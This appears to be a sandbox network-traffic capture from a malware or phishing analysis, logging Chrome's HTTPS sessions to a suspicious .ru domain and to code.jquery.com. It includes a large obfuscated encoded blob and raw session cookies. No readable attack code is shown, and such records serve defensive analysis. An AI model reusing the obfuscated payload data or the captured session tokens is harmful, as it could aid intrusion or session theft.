OFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++oO++o
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f Data Ascii: FpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO++oO
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f Data Ascii: pO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oO++oOO
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b Data Ascii: OOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f Data Ascii: OFpO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO++oO++o
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f Data Ascii: FpO++oO++oO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oOOFpO
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b Data Ascii: pOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO+
2025-03-24 23:59:41 UTC	1369	IN	Data Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 Data Ascii: OOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49708	151.101.130.137	443	4920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 23:59:42 UTC	664	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://knig.rocaterma.ru/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 23:59:42 UTC	565	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Mon, 24 Mar 2025 23:59:42 GMT Via: 1.1 varnish Age: 1529765 X-Served-By: cache-lga21992-LGA X-Cache: HIT X-Cache-Hits: 1759 X-Timer: S1742860782.478204,VS0,VE0 Vary: Accept-Encoding
2025-03-24 23:59:42 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-24 23:59:42 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-24 23:59:42 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-24 23:59:42 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-24 23:59:42 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-24 23:59:42 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49709	172.67.194.216	443	4920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 23:59:42 UTC	1326	OUT	GET /favicon.ico HTTP/1.1 Host: knig.rocaterma.ru Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://knig.rocaterma.ru/krVkG/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6IjFzSmg2UGNrNGViZlF1ZmtKNDNTUHc9PSIsInZhbHVlIjoiL2d5dVNCWjhGTyszVUxSa25vZVd2TnZHVFU1VFg4SUl4ekNtV2VJbTBrdXNQMmYxWXc0dzZUMVZVanNpYytuNVRvZ29ZZFpnNmVVekJZVlAyc1p5c3JlRlV4RTB2NzIrSWJjTWhKR0ZYbG9JcUpPU0g1c0xhWk1rbGRtaVA4eTEiLCJtYWMiOiJjZmQzMTUxOWZmZmU1Y2FhOTVkZWVmZTZhZDQ0MWJkN2U4MTJkOWFmNjZjNjhjMjBhZTMyNmEwOTNmNjIxMmYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJuSjB0MzhyRUkrUWJSaVkvU292VFE9PSIsInZhbHVlIjoiNk9KSEcxNFdFWm9ldHVqWXVpenRxTHdiMHhXL2w4aXlpaHlVQU1QQ21yVXkwR292U0RLM0pjSUl2dUhYMTNWUlF6YUtSZ2h4bWNWZGpMeUlnemJGRDMxdEhFMGdZWEI5NUNaUTB5aWNLcW96aW9INDUrd1V2dTB4OHBpWERWVnYiLCJtYWMiOiI4YzQyZDE4MDcyYmU5NmNiNTk3YzUwOGRkYjllOGNiMjA2N2I2MWI0MzJmODJjOWI2MzQ2NjdmZDNhMDFlODMxIiwidGFnIjoiIn0%3D
2025-03-24 23:59:43 UTC	1068	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Mar 2025 23:59:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding server-timing: cfL4;desc="?proto=TCP&rtt=35119&min_rtt=35008&rtt_var=13207&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2236&delivery_rate=81352&cwnd=252&unsent_bytes=0&cid=87cb41bd4521fd5f&ts=395&x=0" Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Server: cloudflare CF-RAY: 925a1fb69914c64a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=96202&min_rtt=96048&rtt_var=20385&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1898&delivery_rate=38769&cwnd=226&unsent_bytes=0&cid=cee02409b072dd4f&ts=831&x=0"
2025-03-24 23:59:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49711	35.190.80.1	443	4920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 23:59:44 UTC	546	OUT	OPTIONS /report/v4?s=Oy0I1zZ7AGgSIslvjcjtBKXWR55D1T3Z8PSA1Ku7%2FyqlIvsNdXXekALkMS%2F8fLtU4jwn1%2FlZZxwnBSMXOXQjETMgbycsN%2BH0RyWBWcF8vOBHoNw8vnySEevWk3UQtp%2BOxulq HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://knig.rocaterma.ru Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
